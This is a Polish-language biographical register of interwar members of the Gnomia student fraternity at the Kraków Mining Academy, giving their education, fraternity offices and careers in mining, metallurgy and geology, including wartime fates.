 32. Jerzy Władysław Guschlbauer, (3 kwietnia 1903 w miejsc. Jedlicze - styczeń 1950 w Krakowie) s. Marcina, absolwent VIII Gimnazjum Matematyczno-Przyrodniczego w Krakowie, student i absolwent Wydziału Hutniczego AG 1923-30, po studiach pracownik m.in. Zakładów Starachowickich, Huty “Pokój” w Bytomiu, dyrektor techniczny Huty “Laura-Jedność” w Siemianowicach 1945-48, kierownik biura projektów wstępnych Hajduckich Zakładów Hutniczych w Chorzowie 1948-49, szef działu technicznego Biprohut w Gliwicach 1949
 33. Kazimierz Przemysław Guzowski, (12 kwietnia 1906 w Radzyminie - lata 80-te) s. Stefana, absolwent Gimnazjum Matematyczno-Przyrodniczego W. Łukasińskiego w Dąbrowie Górniczej, student i absolwent Wydziału Górniczego AG 1924-46, akt. 192?-39, od 1930 pracował w przemyśle wydobywczym m.in. kierownik wierceń poszukiwawczych nafty w miejsc. Wójcza Państwowego Instytutu Geologicznego 1939, kierownik stacji hydrogeologicznej w Czeladzi 1949-52, naczelnik wydziału hydrologii i geologii inż. 1952-58, główny geolog Kopalni i Zakładów Przetwórczych Siarki w Tarnobrzegu 1958-63, prof. Centrum Technologii Górniczej 1964-67, geolog i prof. Office de Formation Professionelle et de l’Emploi w Tunisie 1967-71
 34. Herman Augustyn Hałupka, (27 sierpnia 1917 w Pawłowie na Śląsku - 7 stycznia 1995 w Toronto) student AG 1936-39, c. 1938, akt. 1938-39, żołnierz PSZ we Francji i Wielkiej Brytanii 1940-47, odkomenderowany do ukończenia studiów, student i absolwent Rady Akademickich Szkół Technicznych 1942-44, po wojnie pozostał na emigracji, wykładowca chemii nieorganicznej w szkole technicznej w Millom w Cumberland w Wielkiej Brytanii 1947/48, inż. metalurg “South West Africa Co.” w Londynie 1948-55 (w tym asystent kierownika i kierownik zakładu przeróbki rud w Abenab w Namibii 1949-44), później w Kanadzie, m.in. kierownik zakładu przeróbki “The Hilton Mines Ltd.” w Shawville w Quebec 1957-63, na stanowiskach kierowniczych w “Marcona Mining Co.” w San Juan w Peru 1964-76 oraz w “Samarco Mineracao” w Brazylii 1976-79, później niezależny doradca w Toronto
 35. Wiesław Hanysz, student AG 1929-31, c. 1930, akt. 1930-31, wstąpił do służby czynnej WP
 36. Tadeusz Hermanowicz, (27 marca 1910 w Nakle - ok. 1967 w Stanach Zjednoczonych) absolwent Gimnazjum w Szczekocinach, student i absolwent Wydziału Hutniczego AG 1929-36, asystent ruchu w Hucie “Baildon” w Katowicach 1936-39
 37. Czesław Jan Horski, (12 lipca 1908 w Dąbrowie Górniczej - prawd. po 1979) s. Ludwika, absolwent Gimnazjum im. W. Łukasińskiego w Dąbrowie Górniczej, student i absolwent Wydziału Górniczego AG 1930-39, c. 1930, akt. 1930-39, po studiach pracownik m.in. kopalni “Flora” w Gołonogu, “Paryż” w Dąbrowie Górniczej, “Grodziec” w Grodziecu, “Michał” w Michałowicach, zawiadowca w kopalni “Kleofas” w Katowicach 1950-59, główny inż. kopalni “Nowy Wirek” w Rudzie Śląskiej 1959-62, główny inż. ds. inwestycji kopalni “Czeladź” w Czeladzi 1963-71, od 1971 na emeryturze
 38. Eugeniusz Iwanow, (2 luty 1910 w Brześciu nad Bugiem - prawd. po 1975) s. Samuela (notariusza w Równem), absolwent Gimnazjum Tadeusza Kościuszki w Równem, student i absolwent Wydziału Hutniczego AG 1929-49, c. 1930, akt. 1930-39, kierownik kontroli technicznej Walcowni Metali “Dziedzice” 1936-39, w wojnie obronnej 1939 w Armii Poznań, uciekł z niewoli niemieckiej, przy budowie Huty Akmilińsk-Kartały-Karaganda 1940, w II Korpusie gen. Władysława Andersa 1942- (m.in. Bliski Wschód, Włochy), główny technolog 1949-72 i kierownik wydziału badawczo-doświadczalnego 1972-75 w Walcowni Metali “Dziedzice”, doktorat AG 1972, od 1975 na emeryturze
 39. Mariusz Iwanow, student AG 1937-39, c. 1938, akt. 1938-39, pracownik Walcowni Metali w Dziedzicach
 40. Juliusz Iwaszkiewicz, student AG, później WSH, akt. 1930-32, sekretarz sem. zim. 1931/32 (od października), skreślony z Korporacji
 41. Jerzy Jaczewski, (9 marca 1902 w Kijowie - 1984) s. Ottona, absolwent Gimnazjum im. Jana Zamojskiego w Warszawie, w WP 1920, student Wydziału Mechanicznego PW, student i absolwent Wydziału Górniczego AG 1921-28, przewodniczący Krakowskiego Koła Międzykorporacyjnego 1924/25, prezes Zarządu Koła Starych Strzech 1939, pracował m.in. w Polish-American Supply Co. w Nowym Yorku 1946-50, dyrektor Przedsiębiorstwa Robót Górniczych “Zachód” 1951-58, dyrektor Zjednoczenia Budownictwa Górniczego w Katowicach 1959-62, dyrektor “Kopex” w Katowicach 1962-69, od 1969 na emeryturze
 42. Kazimierz Jarzymowski, założyciel Gnomii, w 1938 w Zakładach Hohenlohego w Wełnowcu
 43. Ignacy Jeleniewski, student AG, student i absolwent WSH, akt. 1928-32, I wiceprezes sem. zim. 1928/29, olderman sem. zim. 1931/32 (od grudnia)
 44. Franciszek Jopek, (8 października 1901 w Budziwoju - 16 luty 1970 w Katowicach), absolwent Gimnazjum Klasycznego w Rzeszowie, student i absolwent Wydziału Górniczego AG 1920-25, po studiach m.in. pracował w kopalniach “Barbara” w Mikołowie oraz “Giesche” w Janowie, po wojnie zastępca naczelnego dyrektora technicznego w Centralnym Zarządzie Przemysłu Węglowego 1945-50, naczelny dyrektor Chorzowskiego Zjednoczenia Przemysłu Węglowego 1950-53, podsekretarz stanu w Ministerstwie Górnictwa 1953-69
 45. Wincenty Kacprzak, (10 luty 1907 w Porębach - 24 kwietnia 1974 w Katowicach) s. Jana, absolwent Gimnazjum Humanistycznego w Tomaszowie Mazwieckim, student i absolwent Wydziału Górniczego AG 1926-37, akt. 192?-31, oficer rez., po studiach m.in. pracował w kopalniach “Hrabia Renard” w Sosnowcu, “Kozaki” k. Złoczowa, “Glińsk” k. Żółkwi, “Orzeł Biały” w Brzezinach Śląskich, dyrektor kopalni cynku i ołowiu “Marchlewski 1946-50, wicedyrektor ds. górnictwa Centralnego Zarządu Przemysłu Metali Nieżelaznych w Katowicach 1950-52, główny inż. w Centralnym Zarządzie Kopalnictwa Rud Nieżelaznych w Katowicach 1952-58, dyrektor techniczny Zjednoczenie Górniczo-Hutniczego Metali Nieżelaznych w Katowicach 1958-69, główny specjalista ds. górniczych w Kombinacie Górniczo-Hutniczym “Orzeł Biały” w Brzezinach Śląskich 1969-72, od 1972 emerytura
 46. Bolesław Kałużny, (20 października 1910 w Taganrog w Rosji - 29 września 1941) s. Andrzeja, brat Jerzego i Witolda (obaj Gnomia), c. 1930, akt. 1930-31, absolwent Miejskiego Gimnazjum Matematyczno-Przyrodniczego AG 1929-35, zastępca zawiadowcy kopalni “Dorota” 1936-39, oficer rez. WP, walczył w wojnie obronnej 1939j, w niewoli niemieckiej, zmarł w oflagu
 47. Jerzy Kałużny, (24 listopad 1906 w Jasinówce w Rosji - ) s. Andrzeja, brat Bolesława i Witolda (obaj Gnomia), absolwent Gimnazjum w Katowicach, student Wydziału Hutniczego AG 1926-34, akt. 192?-31, kierownik odlewni Huty “Ferrum” w Katowicach 1935-39, po wojnie na emigracji w Kanadzie
 48. Witold Kałużny, (29 czerwca 1902 w Jasieniówce w Rosji - listopad 1937 w Kazimierzu) s. Andrzeja, brat Bolesława i Jerzego (obaj Gnomia), absolwent Szkoły Komercyjnej w Irkucku, student i absolwent Wydziału Górniczego AG 1922-30, inż. wentylacji w kopalni “Kazimierz” w Kazimierzu Górniczym
 49. Ludwik Kaniak, (28 października 1915 - 197? w Buenos Aires) student Wydziału Górniczego AG 1934-39, c. 1938, akt. 1938-39, ukończył Polish University Collage z inż. lądowej 1950, pozostał na emigracji, osiadł w Argentynie, z ramienia argentyńskiej firmy budował elektrownię Isfahan w Iranie
 50. Jerzy Kaniut, (25 marca 1916 w Chorzowie - 4 grudnia 1973) s. Jana, absolwent Gimnazjum Matematyczno-Przyrodniczego Stanisława Kostki w Chorzowie, student i absolwent Wydziału Hutniczego AG 1936-47, c. 1938, akt. 1938-39, sekretarz zewn. sem. let. 1938/39, pracował m.in. w Hucie “Kościuszko” w Chorzowie, kierownik stalowni w Hucie “Bieruta” w Częstochowie oraz Hucie “Florian” w Świętochłowicach 1952-62, zastępca dyrektora w Zakładach Przerobu Złomu Metali Nieżelaznych w Rudzie Śląskiej 1963-66, starszy projektant w Biurze Projektów Przemysłu Hutniczego w Gliwicach 1966
 51. Jan Karliński, (1913-2002) student i absolwent Wydziału Górniczego AG, c. 1930, akt. 1930-39
 52. Julian Kocko, student AG 1928-3?, a później prawa UW, akt. 1930-32, sekretarz, a następnie wiceprezes sem. zim. 1930/31
 53. Jerzy Bronisław Kolbe, (3 listopada 1906 w miejsc. Grodziec - 12 maja 1977 w Katowicach) s. Bronisława, absolwent Gimnazjum im. Mikołaja Raja w Warszawie, student i absolwent Wydziału Górniczego AG 1924-30, olderman sem. zim. 1928/29, wiceprezes Zarządu Koła Starych Strzech 1939, po studiach pracował m.in. w kopalniach “Huta Laura” w Siemianowicach, “Charlotta” w Rydułtowach, “Anna” w Pszowie, Zarządzie S.A. “Godula”, po wojnie kierownik 1945-46 i dyrektor 1946-50 wydziału planowania Centralnego Zarządu Przemysłu Węglowego, wicedyrektor departamentu planowania 1950-55 oraz departamentu inwestycji 1955-69 Ministerstwa Górnictwa w Katowicach, wykładowca Wyższej Szkoły Ekonomicznej w Katowicach 1949-54 oraz w Katedrze Ekonomiki i Organizacji AG 1946-70, doktorat AG 1955, prof. nadzw. 1956-70
 54. Adolf Kosiec, (2 czerwca 1901 w Błędowicach Dolnych w Czechosłowacji - 8 stycznia 1962 w Zabrzu), s. Franciszka, absolwent Gimnazjum w Cieszynie, student i absolwent Wydziału Górniczego AG 1922-45, założyciel Gnomii, urzędnik Oddziału Budowlanego Rudzkiego Gwarectwa Węglowego 1930-39, uczestnik wojny obronnej 1939, po wojnie pracował m.in. w kopalniach “Bielszowice” w Bielszowicach oraz “Zabrze” w Zabrzu
 55. Jerzy Kostecki, inż., w 1938 w Katowicach
 56. Bolesław Kostkiewicz, student AG 1926- , akt. lata 20-te
 57. Stefan Koszarski, (3 grudnia 1899 w Isil-Kul - ) absolwent Szkoły Handlowej w Omsku, student i absolwent Wydziału Górniczego AG 1925-30, akt. ok. 1927
 58. Mieczysław Kotłowski, student AG 1924-26, student i absolwent Wydziału Rolnego UJ, akt. 1927-31, sekretarz Krakowskiego Koła Międzykorporacyjnego sem. let. 1927/28, w 1938 miejsc. Jastrzębie k. Kalwarii
 59. Władysław Krotkiewski, (11 marca 1897 w Ćwielowie- 1 lutego 1991) absolwent V Gimnazjum Klasycznego w Warszawie, student PW 1916-19, w 2 Pułku Artylerii WP 1918-21, student i absolwent Wydziału Górniczego AG 1921-29, założyciel Gnomii, pracownik kopalni “Modrzejów” w Modrzejowie, “Kazimierz” w Kazimierzu Górniczym, “Ferdynand” w Katowicach, “Giesche” w Janowie, w czasie wojny w kopalniach w Turcji, dyrektor kopalni “Mikulczyce” w Bytomiu 1946, główny inż. 1946-48 oraz dyrektor techniczny 1948-51 dla kopalń “Miechowice” i “Mikulczyce”, dyrektor techniczny i zastępca dyrektora naczelnego Katowickiego Zjednoczenia Przemysłu Węglowego 1951-56, dyrektor Przedsiębiorstwa Budowy Płytkich Kopalń w Katowicach 1956-58, generalny projektant Biura Projektów Górniczych w Katowicach 1958-59, dyrektor Centralnej Stacji Ratownictwa Górniczego w Bytomiu 1959-70, od 1971 na emeryturze
 60. Werner (po wojnie Władysław ?) Krzanowski, (1915 - ) student i absolwent Wydziału Górniczego AG, c. 1935, akt. 1935-39, prezes sem. let. 1938/39, w 1938 w Wielkich Hajdukach

  Tadeusz Krzemiński, lata 30-te.

 61. Tadeusz Krzemiński, (27 grudnia 1909 w Rakowie - 17 kwietnia 1992 w Chorzowie) s. Henryka, absolwent Gimnazjum im. Waleriana Łukasińskiego w Dąbrowie Górniczej, student i absolwent Wydziału Górniczego AG 1929-37, c. 1930, akt. 1930-36, prezes Krakowskiego Koła Międzykorporacyjnego sem. zim. 1935/36, po studiach m.in. w kopalniach “Andaluzja” w Brzezinach Śląskich, Zakładach Górniczo-Hutniczych w Cholewskiach, kopalni “Siemianowice” w Siemianowicach, “Barbórka” w Chorzowie, od 1958 inspektor kopalń w Katowickim Zjednoczeniu Przemysłu Węglowego

 62. Franciszek Ladra, (30 września 1909 w Kleśniskach - 12 czerwca 1942 w Auschwitz) s. Rocha, absolwent Gimnazjum w Częstochowie, student i absolwent Wydziału Górniczego 1928-34, akt. 192?-31, po studiach pracownik kopalń “Flora” w Dąbrowie Górniczej oraz “Saturn” w Wojkowicach, aresztowany w 1941 i osadzony w więzieniu w Mysłowicach, a następnie w obozie koncentracyjnym w Auschwitz, tam rozstrzelany
 63. Tadeusz Lambert, (6 grudnia 1907 w Złoczowie - prawd. po 1979) s. Józefa, absolwent Gimnazjum im. Piotra Skargi w Rochatynie, student i absolwent Wydziału Górniczego 1926-37, prezes sem. zim. 1929/30, po studiach pracownik Kopalni Soli Potasowej w Kałuszu, kopalni “Sobieski” w Jaworzno-Borach, Kamieniołomów Stryszów, dyrektor kopalni “Sobieski” w Jaworznie 1945-49 oraz “Czerwona Gwardia” w Grodziecu-Klimontowie 1950-51, dyrektor budowy kopalni “Rokitnica” w Zabrzu 1951-55, wicedyrektor departamentu materiałów wybuchowych Wojewódzkiego Urzędu Górniczego w Katowicach 1955-59, inspektor kopalń Katowickiego Zjednoczenia Przemysłu Węglowego 1959-63, technolog Przedsiębiorstwa Robót Górniczych w Katowicach 1963-70 od 1970 na emeryturze
 64. Tadeusz Langiewicz, student AG 1937-3?, c. 1938, akt. 1938-39
 65. Henryk Wacław Lewandowski, (9 lipca 1899 w Bliżynie - prawd. lata 80-te) s. Mateusza, absolwent Gimnazjum Klasycznego w Zawierciu, student PW, student i absolwent Wydziału Górniczego AG 1921-25, założyciel Gnomii, student Institut Superieur de Commerce w Antwerpii 1925-27, student i absolwent (dypl. 1939 ?) Wydziału Prawa i Administracji UJ, po studiach pracował m.in. w kopalniach “Grodziec” w Grodziecu, “Prezydent” w Chorzowie”, uczestnik wojny obronnej 1939, więzień obozu koncentracyjnego 1939, po wojnie m.in. kierownik analizy i sprawozdawczości planowania głównego w Hucie im. Lenina w Krakowie 1949-52 oraz generalny projektant w Biurze Projektów Przemysłu Węglowego w Krakowie 1952-59, od 1959 na emeryturze
 66. Zygmunt Majewski, (4 czerwca 1903 w Zbarażu - prawd. po 1979), absolwent Gimnazjum w Chyrowie, student i absolwent Wydziału Hutniczego AG 1921-36, asystent PL 1932-34, założyciel Gnomii, akt. 1923-31, sekretarz Krakowskiego Koła Międzykorporacyjnego 1924/25, asystent w Walcowni Metali w Dziedzicach 1934-36, Radzie Stalowej w Katowicach 1936-38, naczelnik wydziału w Naczelnej Organizacji Hutnictwa Żelaznego w Warszawie 1939, organizator i dyrektor działu planowania Centralny Zarząd Przemysłu Hutniczego w Katowicach 1945-46, dyrektor departamentu planowania Ministerstwa Przemysłu i Handlu w Warszawie 1946-49, dyrektor Centralnego Instytutu Informacji Naukowo-Technicznej i Ekonomicznej w Warszawie 1950-61, kierownik zakładu V w Instytucie Naukowym Kultury Fizycznej 1959-68, doradca ministra i główny specjalista w Komitecie Nauki i Techniki w Warszawie 1962-68
 67. Marcin Malinowski, student AG 1936-39, c. 1938, akt. 1938-39
 68. Jerzy Dunin-Markiewicz, (27 września 1900 w Kielcach - 1 stycznia 1965 w Moulent Rocher pod Paryżem) w 3 Pułku Ułanów w wojnie 1918-20, student w Warszawie, c. 1921/22 Jagiellonia, i.p. “Kakadu”, akt. 1921/22-28, student i absolwent Wydziału Górniczego AG 1923-30, po przeniesieniu na studia do Krakowa pomagał organizować Gnomię, członek Gnomii, po studiach pracował w kopalni “Kazimierz - Juliusz” w Strzemieszycach, uczestnik wojny obronnej 1939, w kampanii francuskiej 1940 w Dywizji Grenadierów, w niewoli niemieckiej w oflagu XIII i XVII A Edelbach, po wojnie na emigracji we Francji, dyrektor techniczny kopalni manganu Société Miniere d’Agadir w Casablance 1948-55 oraz kopalni “Hasbaya” w Libanie 1956-58, dyrektor Société Tarbaise d’Industrie Chmique we Francji 1959-62, odznaczony dwukrotnie Krzyżem Walecznych
 69. Zygmunt Martynowski, (3 maja 1908 w miejsc. Semerenki - 10 czerwca 1978 w Dziedzicach) s. Zygmunta, absolwent Gimnazjum im. Tadeusza Kościuszki w Łucku, student i absolwent Wydziału Hutniczego 1928-36, po wojnie pracownik m.in. Firmy “Norblin, Buch, Werner” w Głównie 1937-39, szef produkcji 1945-50, główny inż. 1950-57, dyrektor 1957-65, zastępca dyrektora ds. postępu technicznego 1965-73, od 1973 na emeryturze
 70. Marcin Matlak, (26 września 1909 w Wadowicach - po 1970) s. Alfreda, absolwent Gimnazjum Matematyczno-Przyrodniczego w Kielcach, student Wydziału Górniczego AG 192?-1931, akt. 1928-31, II wiceprezes sem. zim. 1928/29, delegat Zarządu Koła Starych Strzech do konwentu czynnego 1939, po studiach pracownik m.in. kopalni “Flora” w Dąbrowie Górniczej, “Andaluzja” Brzozowicach Śląskich, główny inż. Zabrzańskiego Zjednoczenia Przemysłu Węglowego 1946-50, naczelny inż. w kopalni “Nowy Wirek” w Rudzie Śląskiej 1954-58 oraz kopalni “Halemba” 1958-68, projektant w Głównym Instytucie Górnictwa w Katowicach 1969/70, od 1970 na emeryturze
 71. Marian Maurizio (po wojnie prawd. Abramowicz), ( - lata 80-te/90-te ?) student AG 1925-28, akt. lata 20-te, wystąpił z Korporacji, po wojnie na emigracji w Hiszpanii (?)
 72. Konrad Meissner, (17 maja 1904 w Brzozówce - ok. 2001/2) s. Hermana, absolwent Gimnazjum Jana Śniadeckiego w Kielcach, student i absolwent Wydziału Górniczego AG 1924-33, c. 1924, akt. 1924-31, skarbnik Zarządu Koła Starych Strzech 1939, po studiach pracownik m.in. kopalni “Flora” w Dąbrowie Górniczej, kopalni “Godula” w Chebzie, dyrektor kopalni “Bytom” w Bytomiu 1945-48, pracownik Bytomskiego Zjednoczenia Przemysłu Węglowego, w tym zastępca naczelnego inż. oraz dyrektor techniczny, I zastępca dyrektora 1952-65, p.o. naczelnego dyrektora 1965-66 oraz zastępca dyrektora ds. techniczno-naukowych 1966-70 w Głównym Instytucie Górnictwa w Katowicach, od 1970 na emeryturze doc. dr inż., prof. AGH

  Otton Mierzowski, 1926 r.

 73. Otton Mierzowski, (28 grudnia 1903 w Hulczynie na Śląsku Opawskim - 19 marca 1959 w Siemianowicach Śląskich) s. Józefa i Julii z d. Wolny, uczeń Gimnazjum we Wrocławiu 1913-19, uczeń i absolwent Gimnazjum w Katowicach 1919-22, student i absolwent Wydziału Górniczego 1922-29, c. 1924, pracownik kopalni “Huta Laura” w Siemianowicach, kopalni “Richter” w Siemianowicach 1929-39, uczestnik wojny obronnej 1939, w niewoli sowieckiej od września do listopada 1939, na robotach przymusowych w Niemczech 1939-40, później pracownik Fabryki Sztucznego Jedwabiu w Tomaszowie Mazowieckim 1940-45, po wojnie zawiadowca 1945-47 i dyrektor 1947-50 kopalni “Siemianowice” w Siemianowicach, inspektor 1950-53 oraz dyrektor 1953-59 Okręgowego Urzędu Górniczego w Katowicach, zmarł w wyniku wypadku w kopalni ‘Wieczorek” w Katowicach (zatrucie gazem przy otwieraniu pogazowego chodnika)

 74. Juliusz Mokry, (28 luty 1910 w Drochobyczu - ) absolwent Gimnazjum im. Stanisława Jaworskiego w Krakowie 1929, student i absolwent Wydziału Górniczego AG, c. 1929 Capitolia, akt. 1929, później (?) w Gnomii, w 1938 we Lwowie
 75. Zdzisław Monikowski, (25 lipca 1910 w Łozdrojach - 4 grudnia 1997 w Katowicach) s. Antoniego, absolwent Gimnazjum Matematyczno-Przyrodniczego im. K. Brzostowskiego w Suwałkach, student i absolwent Wydziału Górniczego AG 1929-38, c. 1929, po studiach pracował m.in. w kopalni “Kazimierz-Juliusz” w Kazimierzu, kopalni “Eugeniusz” na Zaolziu, dyrektor Okręgowego Urzędu Górniczego w Chorzowie 1945-56, dyrektor Okręgowego Urzędu Górniczego w Dąbrowie Górniczej 1956-59, naczelny inż. w kopalni barytu w Boguszowie 1959-62, adiunkt w Głównym Instytucie Górniczym w Katowicach 1962-69, od 1969 doradca naczelnego dyrektora w Zjednoczeniu Budownictwa Górniczego w Katowicach
 76. Paweł Morcinek, c. 1938, akt. 1938-39, sekretarz wewn. sem. let. 1938/39
 77. Alojzy Mroczkowski, student AG 1925-28, akt. 192?-31, wystąpił z Korporacji
 78. Jerzy Nawroczyński, ( - początek lat 80-tych) c. 1938, akt. 1938-39
 79. August Nieniewski, (18 listopada 1901 w Paszkówce - 18 marca 1987 w Buenos Aires) student Szkoły Realnej w Krakowie, jako ochotnik w 2 Pułku Szwoleżerów Rokitniańskich WP 1918-20 (?), uczestnik wojny polsko-bolszewickiej, odznaczony Virtuti Militari, student i absolwent Wydziału Górniczego AG 1921-29, założyciel Gnomii, po studiach m.in. geolog w firmie “Karpaty” w Borysławiu, w firmie “Małopolska” w Borysławiu, kierownik Instytutu Naftowego w Krośnie 1931-39, w czasie II wojny światowej w PSZ na Zachodzie w Brygadzie Karpackiej (m.in. obrona Tobruku), zastępca dowódcy zaopatrzenia i transportu 3 Dywizji Karpackiej 1942-44 oraz 2 Korpusu 1944-46, po wojnie na emigracji w Ameryce Południowej, geolog pracujący przy poszukiwaniach złóż rud metali w Fabricationes Militares Buenos Aires 1947-55 oraz w Compania Minera de Bolivia-Oruro 1955-57, od 1957 na emeryturze
 80. Zbigniew Gawin-Niesiołowski, (21 maja 1903 we Lwowie - po 1973) s. Witolda, absolwent Gimnazjum w Krakowie, student i absolwent Wydziału Górniczego AG 1922-36, c. 1924, akt. 1924-31, prezes sem. zim. 1928/29, asystent w Katedrze Fizyki i Katedrze Maszynoznawstwa I 1933-36, po studiach pracownik m.in. kopalni “Pokój” w Nowym Bytomiu 1937, główny inż. maszyn 1945-48 oraz dyrektor głównych warsztatów 1947-48 Chorzowskiego Zjednoczenia Przemysłu Węglowego, inspektor w Zjednoczeniu Fabryki Maszyn w Bytomiu 1948-51, pracownik inż.-techniczny oraz adiunkt pracowni wierceń wielkośrednicowych Instytutu Górniczego w Katowicach 1960-72, od 1973 na emeryturze
 81. Stanisław Noakowski, ( - zm. w Katowicach) student AG, później student i absolwent prawa UJ, akt. 1930-31, w 1938 w Katowicach
 82. Teofil Karol Nowicki, (28 stycznia 1902 w Nowym Sączu - 1940 w Charkowie) s. Jana i Ludmiły, absolwent Gimnazjum Państwowego w Rzeszowie 1920, w wojnie 1918-20 w 1 Pułku Piechoty Ziemi Rzeszowskiej, student i absolwent 1928 górnictwa AG, inicjator i założyciel Gnomii, akt. 1923-39, por. rez. piechoty, przydzielony do 20 Pułku Piechoty, w niewoli sowieckiej, zamordowany przez NKWD
 83. Adolf Stanisław Nowotny, (3 grudnia 1912 w Stanisławowie - 15 kwietnia 1992 w Chorzowie) s. Stanisława i Stefanii z Cetnarskich, absolwent Gimnazjum M. Kopernika w Toruniu, student i absolwent Wydziału Hutniczego AG 1931-37, filister 1938, kierownik Walcowni Metali Laboratorium Wytrzymałościowo-Metaloznawczego w Dziedzicach (?) 1938-39, w wojnie obronnej 1939 w Batalionie Elektrotechnicznym, uczestnik powstania warszawskiego 1944, później w obozie pracy przymusowej w Hanowerze 1944-45, a następnie w obozie wysiedleńczym w Fellingostell 1945-46, od 1946 w Hucie “Batory”, m.in. kierownik walcowni blachy białej, szef urządzeń walcowni blach cienkich, kierownik, dyrektor techniczny 1954-72, główny specjalista ds. perspektywicznego rozwoju huty
 84. Zbigniew Zygmunt Obuchowicz, (13 października 1914 w Śniatyniu - 31 grudnia 1965 w Krakowie) s. Zygmunta, absolwent Gimnazjum Kazimierza Jagiellończyka w Kołomyi, student i absolwent Wydziału Górniczego AG 1932-46, akt. 1938-39, olderman 1939 (ostatnie Prezydium), delegat na XII Zjazd ZPKA, skarbnik Krakowskiego Koła Międzykorporacyjnego sem. zim. 1935/36, prezes Krakowskiego Koła Międzykorporacyjnego sem. zim. 1938/39, po studiach geolog kartograf firmy “Polmin” w Drohobyczu, geolog kopalniany firmy “Karpathenoel” w Chodnowicach i Kosowie, kierownik Przedsiębiorstwa Geologicznego w Stryju 1943-45, geolog przemysłowy w Krośnie 1946-47, główny geolog Przedsiębiorstwa Poszukiwań Naftowych w Krakowie 1948-52, kierownik Głównego Laboratorium Przemysłu Naftowego w Krakowie 1952-56, główny geolog Przedsiębiorstwa Poszukiwań Naftowych w Krakowie 1956-61, docent Instytutu Geologicznego w Krakowie 1961-65

  Zygmunt Ochab.

 85. Zygmunt Jan Ochab, (31 marca 1905 w Krakowie - 26 marca 1962 w Krakowie) s. Michała i Genowefy z Kosydarskich, absolwent Gimnazjum im Króla Jana III Sobieskiego w Krakowie 1923, student i absolwent Wydziału Górniczego AG 1923-32, c. 1925, akt. 1925-31, asystent w Katedrze Geodezji i Miernictwa Górniczego AG 1926-34, kierownik działu ruchu powierzchni Zjednoczenia Przemysłu Węglowego “Skaboferme” w Chorzowie 1934-39, kierownik działu mierniczego Chorzowskiego Zjednoczenia Przemysłu Węglowego 1945-47, inspektor Wojewódzkiego Urzędu Górniczego w Katowicach 1947-50, zastępca prof. i docent w Katedrze Geodezji i Miernictwa PŚ 1950-62, samodzielny pracownik naukowy i kierownik pracowni ruchów powierzchni Głównego Urzędu Górniczego w Katowicach, odznaczony m.in. Złotym Krzyżem Zasługi, Krzyżem Kawalerskim OOP

 86. Jan Opara, student Wydziału Górniczego AG, założyciel Gnomii, akt. 1923-39, prezes 1928
 87. Witold Orłowski, (3 luty 1903 w Jarosławiu - 1942 na Syberii) absolwent Gimnazjum J. Konarskiego w Rzeszowie, student i absolwent Wydziału Górniczego AG 1921-28, założyciel Gnomii, inż ruchu i kierownik płuczki w kopalni “Biały Szarlej” w Brzezinach Śląskich 1930-39, w 1939 ewakuował się na wschód, uwięziony przez NKWD, zesłany do łagrów na Syberii
 88. Zygmunt Osika, (4 lipca 1909 w Clevland - po 1979) s. Jana, absolwent Gimnazjum Bolesława Chrobrego w Gnieźnie, student i absolwent Wydziału Hutniczego AG 1930-46, c. 1930, akt. 1930-39, asystent Katedry Metalurgii AG 1937-39, od 1945 pracownik AG, doktorat 1962, docent 1970
 89. Zygmunt Piotr Paciej, (1 maja 1907 w Sosnowcu - prawd. po 1979) s. Piotra, absolwent Gimnazjum im. Bolesława Prusa w Sosnowcu, student i absolwent AG 1929-48, c. 1930, akt. 1930-39, uczestnik wojny obronnej 1939, w PSZ na Zachodzie 1939-45, po wojnie m.in. nadsztygar i kierownik robót górniczych w kopalni “Ludwik” w Zabrzu 1946-48, naczelny inż. w kopalni “Bielszowice” w Bielszowicach oraz kopalni “Mysłowice” w Mysłowicach, “Piast” w Lędzinach, dyrektor kopalni “Siersza” w Sierszy 1954-58, dyrektor kopalni “Julian” w Piekarach Śląskich 1958-61, inspektor kopalń 1961-65 oraz inspektor BHP 1965-69 w Katowickim Zjednoczeniu Przemysłu Węglowego, od 1970 na emeryturze
 90. Witold Parysiewicz, (15 listopada 1907 w Sosnowcu - 6 maja 1967 w Warszawie), s. Stanisława, absolwent Gimnazjum w Chorzowie, student i absolwent Wydziału Górniczego 1926-33, akt. 1927-29 (?) w Praetorii, sekretarz 1928, prawd. wystąpił z Preatorii i wstąpił do Gnomii, akt. 1930-31 w Gnomii, filister 1938/39, po studiach pracownik kopalni “Wujek” w Katowicach 1933-39 i od 1945, po wojnie dyrektor 1946-49, główny inż. górniczy w Przedsiębiorstwie Budowy Zakładów Górniczych w Mikołowie 1949-50, dyrektor techniczny Przedsiębiorstwa Budowy Zakładów Przemysłu Węglowego “Wschód” w Mikołowie 1950-52, dyrektor Biura Projektów Nowych Kopalń w Gliwicach 1955-64, od 1955 wykładowca PŚ, doktorat 1962, prof. nadzw. 1965, kierownik Katedry Eksploatacji Złóż 1955-67, dziekan Wydziału Górniczego 1966-67
 91. Kazimierz Paszyński, (20 luty 1892 w Warszawie - 15 września 1966 w Warszawie) s. Kazimierza, żołnierz Legionów Polskich 1914-18, student i absolwent wydziału Górniczego 1921-38, założyciel Gnomii, pierwszy prezes 1923, akt. 1923-39, po studiach m.in. kierownik kamieniołomów miejskich Blizne k. Brzozowa 1941-42, dyrektor Przemysłu Maszynowego w Jeleniej Górze 1945-46, kierownik zakładu robót ziemnych w Instytucie Geologicznym w Warszawie 1949-53, główny geolog w Centralnym Zarządzie Eksploatacji Kruszywa w Warszawie 1953-56, naczelnik działu górniczo-geologicznego w Zjednoczeniu Przemysłu Kruszyw i Surowców Chemicznych w Warszawie 1956-58, pracownik naukowy w Centralnym Laboratorium Kopalnych Surowców Chemicznych w Warszawie 1958-66, wykładowca w Wieczorowej Szkole Inżynieryjnej 1954-59, dziekan Wydziału Geologii 1949-50
 92. Ludwik Petraszunas, ( - lata 80-te) akt. 1930-39, wiceprezes sem. zim. 1931/32 (od grudnia)
 93. Kazimierz Piekarczyk, (11 kwietnia 1914 w Poraju, po 1968) absolwent Gimnazjum im. Henryka Sienkiewicza w Częstochowie, student i absolwent Wydziału Hutniczego AG 1935-48, akt. 1938-39, po studiach pracownik Huty im. B. Bieruta w Częstochowie, od 1950 wykładowca Politechniki Częstochowskiej, doktorat 1968
